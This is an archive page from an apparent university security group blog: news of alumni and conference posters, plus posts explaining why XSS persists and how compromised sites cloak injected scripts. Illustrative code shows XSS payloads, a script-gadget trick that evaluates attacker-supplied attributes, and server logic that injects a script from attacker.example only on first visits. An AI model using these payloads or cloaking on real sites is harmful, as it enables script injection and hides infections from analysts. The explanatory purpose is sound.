Archive for the 'Web Security' Category

Why hasn’t Cross-Site Scripting been solved?

Sunday, December 31st, 2017

By Haina Li

Introduction

In 2017, Bugcrowd reported that cross-site scripting (XSS) remains the number one vulnerability found on the web, accounting for 25% of the bugs found and submitted to its bug bounty programs. XSS has also stayed in the top three of the web’s most common vulnerabilities in recent years. In the 17 years since XSS was first recognized by Microsoft in 2000, it has been the focus of intense academic research and of penetration testing tool development, yet vulnerabilities are still being found even in top websites such as Facebook and Google. In this blog post, we explore some of the reasons why XSS is still a major problem today.

XSS has evolved

XSS has evolved as modern applications have grown far more complex than the static pages they once were. Reflected and stored XSS have not disappeared, since both server- and client-side logic have become more elaborate, but the pattern of replacing server-side logic with client-side JavaScript has also given rise to DOM-based vulnerabilities. Server-side XSS prevention tools that examine deviations between the request and response (such as XSSDS) do not work for DOM-based vulnerabilities, because the entire flow of malicious data from source to sink stays inside the browser and never reaches the server.
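To make the DOM-based case concrete, here is a minimal sketch (hypothetical page code in TypeScript, not taken from any real site) of a vulnerable flow in which the malicious data never reaches the server:

```typescript
// Hypothetical client-side code: read a value from the URL fragment and
// write it into the page. The fragment is never sent to the server, so a
// server-side defense like XSSDS has nothing to compare.
const params = new URLSearchParams(window.location.hash.slice(1));
const name = params.get("name") ?? "guest";

// Vulnerable sink: attacker-controlled data is interpreted as HTML.
// A link such as https://example.com/#name=<img src=x onerror=alert(1)>
// executes script entirely inside the browser.
document.getElementById("welcome")!.innerHTML = `Welcome, ${name}`;

// Safer alternative: treat the value as plain text.
// document.getElementById("welcome")!.textContent = `Welcome, ${name}`;
```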

Newer defenses that can prevent DOM-based XSS attacks include XSS filters and Content Security Policy (CSP). This myriad of sophisticated tools aims at the seemingly simple goal of escaping user-provided content. As it stands, these tools cannot catch all XSS vulnerabilities, and escaping everything all the time would break a web application altogether. For example, recent work by Lekies et al. [PDF] describes a new attack that was missed by every existing XSS prevention technique: the injected payload is benign-looking HTML, but script gadgets (legitimate JavaScript fragments already present in the page) transform it into code that behaves maliciously.
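As a rough illustration of the script-gadget idea (hypothetical library code, greatly simplified; the element and attribute names are made up), the injected markup below contains no script tag or event-handler attribute, yet code already on the page turns it into execution:

```typescript
// Hypothetical widget-library initializer of the kind many pages already ship:
// it scans the DOM and evaluates expressions stored in data attributes.
document.querySelectorAll("[data-on-init]").forEach((el) => {
  // The library assumes data-on-init was written by the page author. An
  // injected <div data-on-init="alert(document.cookie)"></div> looks like
  // harmless HTML to XSS filters and sanitizers, but this line turns the
  // attribute value into running code.
  new Function(el.getAttribute("data-on-init") ?? "")();
});
```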

The effectiveness of web penetration testing tools is limited

In a study of automated black-box web application vulnerability testing, Bau et al. [PDF] tested commercial scanners from vendors such as McAfee and IBM and found that the average XSS detection rates were 62.5%, 15%, and 11.25% for reflected, stored, and advanced XSS (using non-standard tags and keywords), respectively. The study found that the scanners were effective at finding straightforward, textbook XSS vulnerabilities, but lacked sufficient modeling of more complex XSS in the context of the specific web application. Web application scanners are built using a reactive approach, converting new vulnerabilities into test vectors only after they have become a problem. For stored XSS, scanners also struggle to link an injection to a subsequent, later observation. They are often difficult to configure, and can take far too long if set to fuzz every possible location in a large, complicated web application.
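To see why the stored case is harder, here is a rough sketch (hypothetical scanner logic in TypeScript; the URLs and form fields are made up) of the correlation a black-box scanner has to perform between an injection and a later observation:

```typescript
// Hypothetical black-box probe for stored XSS: the scanner must tie the
// payload it submits in step 1 to markup it observes in step 2, which may
// show up later and on a different page. Reflected XSS needs no such link,
// which is one reason its detection rates are much higher.
async function probeStoredXss(): Promise<void> {
  const probeId = `xss-probe-${Date.now()}`;
  const payload = `<script>/*${probeId}*/</script>`;

  // Step 1: submit the probe through some input, e.g. a comment form.
  await fetch("https://app.example/comments", {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: `text=${encodeURIComponent(payload)}`,
  });

  // Step 2: crawl candidate pages later and look for the unique marker.
  const page = await (await fetch("https://app.example/comments/recent")).text();
  if (page.includes(payload)) {
    console.log(`Probable stored XSS: probe ${probeId} rendered unescaped`);
  } else if (page.includes(probeId)) {
    console.log(`Probe ${probeId} was stored, but escaped or transformed`);
  }
}
```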

Conclusion

As with most web vulnerabilities, XSS is not going away anytime soon, because of the constantly evolving technologies of the web and the challenges of developing penetration testing tools with high true-positive rates. However, we may be able to eliminate most client-side security issues by replacing JavaScript with a new language that provides better control-flow integrity, such as WebAssembly.

Muzzammil Zaveri on Forbes 30 under 30

Wednesday, December 6th, 2017

Muzzammil Zaveri (BACS 2011) has been recognized by Forbes Magazine as one of the top 30 venture capitalists under 30. As an undergraduate researcher, Muzzammil worked on GuardRails (a secure web application framework).

Forbes Recognition

UVa Today Article: Meet the 5 Alumni on Forbes’ new ‘30 under 30’ Lists, 15 November 2017.

Cavalier Daily Article: Forbes 30 under 30 recognizes five U.Va alumni, 4 December 2017.

Zaveri stressed the importance of pursuing passion and making positive use of free time while studying as an undergraduate.

“There’s nothing like being in a setting where you can make mistakes and explore interests,” he said. “Doing something that you’re strictly passionate about may not be the most productive — you can explore interests and areas that you might be passionate about and that can be a great springboard into your own career, or whatever you decide to pursue in life after school.”

Zaveri believes he was very lucky with the connections he made at the University, especially in meeting his co-founder, Ethan Fast. He credits Evans, his advisor, with empowering him with knowledge and encouraging him to learn more about tech startups.

“[Evans] really encouraged and spent time diving into startups and exploring some of my interests in building side projects,” he said. “And through that I met my co-founder [Ethan Fast] and ultimately, we ended up starting Proxino together.”

Alumna-Turned-Internet Security Expert Listed Among Nation’s Top Young Innovators

Friday, September 22nd, 2017

Adrienne Porter Felt (SRG BSCS 2008) was selected as one of Technology Review’s 35 Innovators Under 35.

UVA Today has an article: Alumna-Turned-Internet Security Expert Listed Among Nation’s Top Young Innovators, UVA Today, 21 September 2017.

Felt started working in security when she was a second-year engineering student, responding to a request from computer science professor David Evans, who taught the “Program and Data Representation” course. Evans said Felt stood out amongst her peers because of her “well-thought-out answers and meticulous diagrams.”

“For the summer after her second year, she joined a project one of my Ph.D. students was working on to use the disk drive controller to detect malware based on the reads and writes it makes that are visible to the disk,” Evans said. “She did great work on that project, and by the end of the summer was envisioning her own research ideas.

“She came up with the idea of looking at privacy issues in Facebook applications, which, back in 2007, was just emerging, and no one else was yet looking into privacy issues like this.”

Taking Evans’ offer for a research project was a turning point in Felt’s life, showing her something she liked that she could do well.

“It turned out that I really loved it,” she said. “I like working in privacy and security because I enjoy helping people control their digital experiences. I think of it as, ‘I’m professionally paranoid, so that other people don’t need to be.’”

In her final semester as an undergraduate student at UVA, Felt taught a student-led class on web browsers.

“Her work at Google has dramatically changed the way web browsers convey security information to users, making the web safer for everyone,” Evans said. “Her team at Google has been studying deployment of HTTPS, the protocol that allows web clients to securely communicate with servers, and has had fantastic success in improving security of websites worldwide, as well as a carefully designed plan to use browser interfaces to further encourage adoption of secure web protocols.”

SRG at USENIX Security 2017

Saturday, August 12th, 2017

Several SRG students presented posters at USENIX Security Symposium in Vancouver, BC.


Approaches to Evading Windows PE Malware Classifiers
Anant Kharkar, Helen Simecek, Weilin Xu, David Evans, and Hyrum S. Anderson (Endgame)

JSPolicy: Policied Sandboxes for Untrusted Third-Party JavaScript
Ethan Lowman and David Evans

EvadeML-Zoo: A Benchmarking and Visualization Tool for Adversarial Machine Learning
Weilin Xu, Andrew Norton, Noah Kim, Yanjun Qi, and David Evans

Decentralized Certificate Authorities
Hannah Li, Bargav Jayaraman, and David Evans

Modest Proposals for Google

Friday, June 9th, 2017

Great to meet up with Wahooglers Adrienne Porter Felt, Ben Kreuter, Jonathan McCune, Samee Zahur (Google’s latest addition from my group), and (honorary UVAer interning at Google this summer) Riley Spahn at Google’s Research Summit on Security and Privacy this week in Mountain View.

As part of the meeting, the academic attendees were given a chance to give a 3-minute pitch to tell Google what we want them to do. The slides I used are below, but probably don’t make much sense by themselves.

The main modest proposal I tried to make is that Google should take it on as their responsibility to make sure nothing bad ever happens to anyone anywhere. They can start with nothing bad ever happening on the Internet, but with the Internet pretty much everywhere, should expand the scope to cover everywhere soon.

To start with an analogy from the days when Microsoft ruled computing: there was a time when Windows bluescreens were a frequent experience for most Windows users (and at the time, this pretty much meant all computer users). Microsoft analyzed the crashes and concluded that nearly all were because of bugs in device drivers, so it wasn’t their fault and it was horribly unfair for them to be blamed for the crashes. Of course, to people losing their work because of a crash, it doesn’t really matter whose code was to blame. By the end of the 90s, though, Microsoft took on the mission of reducing the problems with device drivers, and a lot of great work came out of this (e.g., the Static Driver Verifier), with dramatic improvements in the typical end user’s computing experience.

Today, Google rules a large chunk of computing. Lots of bad things happen on the Internet that are not Google’s fault. As the latest example in the news, the leaked NSA report of Russian attacks on election officials describes a phishing attack that exploits vulnerabilities in Microsoft Word. It’s easy to put the blame on overworked election officials who didn’t pay enough attention to the books on universal computation they read when they were children, or to put it on Microsoft for allowing Word to be exploited.

But Google’s name is also all over this report: the emails went through gmail accounts, the attacks phished for Google credentials, and the attackers used plausibly-named gmail accounts. Even if Google isn’t to blame for the problems that enable such an attack, they are uniquely positioned to solve it, not only because of their engineering capabilities and resources, but also because of the comprehensive view they have of what happens on the Internet and their powerful ability to influence it.

Google is a big company, with lots of decentralized teams, some of which definitely seem to get this already. (I’d point to the work the Chrome Security Team has done, MOAR TLS, and RAPPOR as just a few of many examples of things that involve a mix of technical and engineering depth and a broad mission to make computing better for everyone, not obviously connected to direct business interests.) But there are also lots of places where Google doesn’t seem to be putting serious effort into solving problems it could, instead viewing them as out of scope because it’s really someone else’s fault (my particular motivating example was PDF malware). As a company, Google is too capable, important, and ubiquitous to view problems as out-of-scope just because they are obviously undecidable or obviously really someone else’s fault.



[Also on Google +]

Insecure by Default? Authentication Services in Popular Web Frameworks

Monday, August 15th, 2016

Hannah Li presented a poster at USENIX Security Symposium on how popular web frameworks perform authentication.



Insecure by Default? Authentication Services in Popular Web Frameworks
[Abstract (PDF)] [Poster (PDF)]

The work studies how design choices made by web frameworks impact the security of web applications built by typical developers using those frameworks. The goal is to understand the usability and performance trade-offs that lead frameworks to adopt insecure defaults, and to develop alternatives that provide better security without sacrificing easy initial development and deployment.

An exercise in password security went terribly wrong, security experts say

Friday, April 1st, 2016

PCWorld has a story about CNBC’s attempt to “help” people measure their password security: CNBC just collected your password and shared it with marketers: An exercise in password security went terribly wrong, security experts say, 29 March 2016.

Adrienne Porter Felt, a software engineer with Google’s Chrome security team, spotted that the article wasn’t delivered using SSL/TLS (Secure Sockets Layer/Transport Layer Security) encryption.

SSL/TLS encrypts the connection between a user and a website, scrambling the data that is sent back and forth. Without SSL/TLS, someone on the same network can see the data in clear text, including, in this case, any password sent to CNBC.

“Worried about security? Enter your password into this @CNBC website (over HTTP, natch). What could go wrong,” Felt wrote on Twitter. “Alternately, feel free to tweet your password @ me and have the whole security community inspect it for you.”

The form also sent passwords to advertising networks and other parties with trackers on CNBC’s page, according to Ashkan Soltani, a privacy and security researcher, who posted a screenshot.

Despite saying the tool would not store passwords, traffic analysis showed it was actually storing them in a Google Docs spreadsheet, according to Kane York, who works on the Let’s Encrypt project.

(Posted on April 1, but this is actually a real story, as hard as that might be to believe.)

Dormant Malicious Code Discovered on Thousands of Websites

Tuesday, December 29th, 2015

Here’s the latest from Yuchen Zhou (PhD 2015, now at Palo Alto Networks): Dormant Malicious Code Discovered on Thousands of Websites, Yuchen Zhou and Wei Xu, Palo Alto Networks Blog, 14 November 2015.



During our continuous monitoring for a 24-hour period from November 11, 2015 to November 12, 2015, eight days after the initial discovery, the Chuxiong Archives website consistently presented malicious content injected by an attacker depending on the source IP and user agent. We believe that if a user were to visit the compromised website a second time following the initial exposure to the malicious code, the site would recognize the source IP and user agent and simply remain dormant, not exhibiting any malicious behavior. Because of this anti-analysis/evasion technique, it is easy to be led to believe that a website no longer poses a threat when it remains infected.

At the time of this report, using our malicious web content scanning system, we have already discovered more than four thousand additional, similarly compromised websites globally that exhibit the same ability to remain dormant or turn active depending on source IP and user agent. Investigations regarding this campaign on a larger scale are ongoing, and a second report detailing the similarly compromised websites will be published in the near future.
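For intuition, the cloaking behavior described in the excerpt amounts to logic like the following sketch (hypothetical and heavily simplified, written in TypeScript for Node; the real campaign’s server-side code is not shown in the report):

```typescript
// Hypothetical sketch of IP/User-Agent cloaking on a compromised server:
// only the first request from a given (IP, User-Agent) pair receives the
// injected payload. Repeat visits, such as an analyst re-checking the site,
// get a clean page, which makes the infection appear to have gone away.
import * as http from "node:http";

const seen = new Set<string>();
const cleanPage = "<html><body>Normal page content</body></html>";
const injectedPage = cleanPage.replace(
  "</body>",
  "<script src='https://attacker.example/payload.js'></script></body>"
);

http.createServer((req, res) => {
  const key = `${req.socket.remoteAddress}|${req.headers["user-agent"] ?? ""}`;
  const firstVisit = !seen.has(key);
  seen.add(key);

  res.writeHead(200, { "Content-Type": "text/html" });
  res.end(firstVisit ? injectedPage : cleanPage);
}).listen(8080);
```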

Computer Science Grad Stands Watch for Users of Google’s Popular Browser

Tuesday, December 8th, 2015

Adrienne Porter Felt (BSCS 2008) returned to UVa last Friday as a Distinguished Alumni Speaker. UVa Today published this article:

Computer Science Grad Stands Watch for Users of Google’s Popular Browser, UVa Today, 7 December 2015.

Adrienne Porter Felt’s job is to keep you secure on Chrome.

Felt, 29, who earned a computer science degree from the University of Virginia in 2008, leads the usable security team at Google working on the popular Internet browser.

Taking Evans’ offer for a research project was a turning point in Felt’s life, showing her something she liked that she could do well.

“It turned out that I really loved it,” she said. “I like working in privacy and security because I enjoy helping people control their digital experiences. I think of it as, ‘I’m professionally paranoid so that other people don’t need to be.’”

SRG at Oakland 2015

Sunday, May 24th, 2015

Several SRGers were at the IEEE Symposium on Security and Privacy (“Oakland”, held this year in San Jose).

Yuchen Zhou presented his work on Understanding and Monitoring Embedded Web Scripts. Yuchen graduated with his PhD the day before the conference, and will be joining Palo Alto Networks.

Samee Zahur is a co-author (along with Benjamin Kreuter, who is an “in-progress UVa PhD student” diverted by Google, and several researchers from Microsoft Research) on the paper, Geppetto: Versatile Verifiable Computation, which was presented by Bryan Parno.

Samee also presented a poster on Obliv-C.

Weilin Xu presented a poster on Automatically Evading Classifiers.

It was also great to see SRG alums Yan Huang (who is now at Indiana University, and was a co-author on the paper about ObliVM), Jon McCune (who is now working on trusted computing at Google), and Adrienne Felt (who was the keynote speaker for the W2SP workshop, and gave a very interesting talk about user-facing security design and experiments in Google Chrome; Adrienne’s first paper was in W2SP 2008 when she was an undergraduate at UVa).